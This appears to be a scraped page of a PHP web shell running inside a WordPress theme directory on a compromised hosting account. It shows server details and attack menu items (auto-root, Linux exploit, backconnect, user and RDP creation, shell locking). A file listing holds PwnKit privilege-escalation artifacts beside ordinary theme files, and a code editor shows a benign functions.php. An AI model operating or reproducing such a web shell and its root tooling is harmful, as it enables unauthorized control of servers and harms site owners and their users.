Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.103.20.10 | : 216.73.217.75
Cant Read [ /etc/named.conf ]
7.4.33
cuisinesj
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
cuisinesj /
www /
new /
wp-content /
themes /
Avenue /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
tinymce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
612
B
-rw-r--r--
archive.php
2.24
KB
-rw-r--r--
author.php
1.92
KB
-rw-r--r--
blog.php
2.38
KB
-rw-r--r--
category.php
2.31
KB
-rw-r--r--
comments.php
4.26
KB
-rw-r--r--
contact.php
1.64
KB
-rw-r--r--
custom.css
22
B
-rw-r--r--
en_EN.po
6.74
KB
-rw-r--r--
footer.php
1.21
KB
-rw-r--r--
fullwidth.php
471
B
-rw-r--r--
functions.php
3.62
KB
-rw-r--r--
header.php
5.35
KB
-rw-r--r--
index.php
7.94
KB
-rw-r--r--
notifier.xml
1.17
KB
-rw-r--r--
page.php
478
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
screenshot.png
85.77
KB
-rw-r--r--
search.php
1.64
KB
-rw-r--r--
searchform.php
474
B
-rw-r--r--
shortcodes.php
11.84
KB
-rw-r--r--
sidebar.php
205
B
-rw-r--r--
single.php
11.57
KB
-rw-r--r--
style.css
30.16
KB
-rw-r--r--
tag.php
1.97
KB
-rw-r--r--
timthumb.php
46.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php // Adds RSS feeds link if(!get_option('pyre_feedburner')) { add_theme_support('automatic-feed-links'); } // Register Widgetized Areas if(function_exists('register_sidebar')) { register_sidebar(array( 'name' => 'Sidebar', 'before_widget' => '<div class="widget">', 'after_widget' => '</div>', 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', )); register_sidebar(array( 'name' => 'Homepage', 'before_widget' => '<div class="homepage-widget">', 'after_widget' => '</div>', 'before_title' => '<h3>', 'after_title' => '</h3>', )); register_sidebar(array( 'name' => 'Homepage (Blog Style)', 'before_widget' => '<div class="homepage-widget">', 'after_widget' => '</div>', 'before_title' => '<h3>', 'after_title' => '</h3>', )); register_sidebar(array( 'name' => 'Footer Widget 1', 'before_widget' => '<div class="widget">', 'after_widget' => '</div>', 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', )); register_sidebar(array( 'name' => 'Footer Widget 2', 'before_widget' => '<div class="widget">', 'after_widget' => '</div>', 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', )); register_sidebar(array( 'name' => 'Footer Widget 3', 'before_widget' => '<div class="widget last">', 'after_widget' => '</div>', 'before_title' => '<h3 class="widget-title">', 'after_title' => '</h3>', )); } // Add post thumbnail functionality add_theme_support('post-thumbnails', array('post')); add_image_size('post-image', 610, 250, true); add_image_size('featured-image', 516, 340, true); add_image_size('featured-image-thumb', 70, 60, true); add_image_size('widget-image', 290, 160, true); add_image_size('widget-image-thumb', 50, 50, true); add_image_size('media-thumb', 140, 90, true); add_image_size('related-thumb', 134, 90, true); // Include boostrap file for the pyre theme framework include_once('framework/bootstrap.php'); // Custom Functions include_once('framework/functions.php'); // Shortcodes include_once('shortcodes.php'); // Profile Metaboxes include_once('framework/profile.php'); // Translation load_theme_textdomain('Avenue', get_template_directory() . '/languages'); $locale = get_locale(); $locale_file = TEMPLATEPATH . '/languages/' . $locale . '.php'; if(is_readable($locale_file)) { require_once($locale_file); } // How comments are displayed function avenue_comment($comment, $args, $depth) { $GLOBALS['comment'] = $comment; ?> <li <?php comment_class(); ?> id="comment-<?php comment_ID() ?>"> <div class="the-comment"> <?php echo get_avatar($comment,$size='60'); ?> <div class="comment-arrow"></div> <div class="comment-box"> <div class="comment-author"> <strong><?php echo get_comment_author_link() ?></strong> <small><?php printf(__('%1$s at %2$s', 'Avenue'), get_comment_date(), get_comment_time()) ?></a><?php edit_comment_link(__('Edit'),' ','') ?> - <?php comment_reply_link(array_merge( $args, array('reply_text' => 'Reply', 'add_below' => $add_below, 'depth' => $depth, 'max_depth' => $args['max_depth']))) ?></small> </div> <div class="comment-text"> <?php if ($comment->comment_approved == '0') : ?> <em><?php _e('Your comment is awaiting moderation.', 'Avenue') ?></em> <br /> <?php endif; ?> <?php comment_text() ?> </div> </div> </div> <?php } // Trim end of excerpt function pyre_trim_excerpt($text) { return rtrim($text, '[...]'); } add_filter('get_the_excerpt', 'pyre_trim_excerpt');
Close